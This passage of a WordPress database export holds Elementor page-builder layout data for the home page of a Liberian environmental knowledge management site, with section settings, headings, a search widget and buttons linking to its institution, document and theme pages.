center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5927,535,'_elementor_version','2.7.5'),(5928,535,'_elementor_template_type','wp-page'),(5938,537,'_wp_page_template','default'),(5939,537,'_elementor_edit_mode','builder'),(5940,537,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Knowledge Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_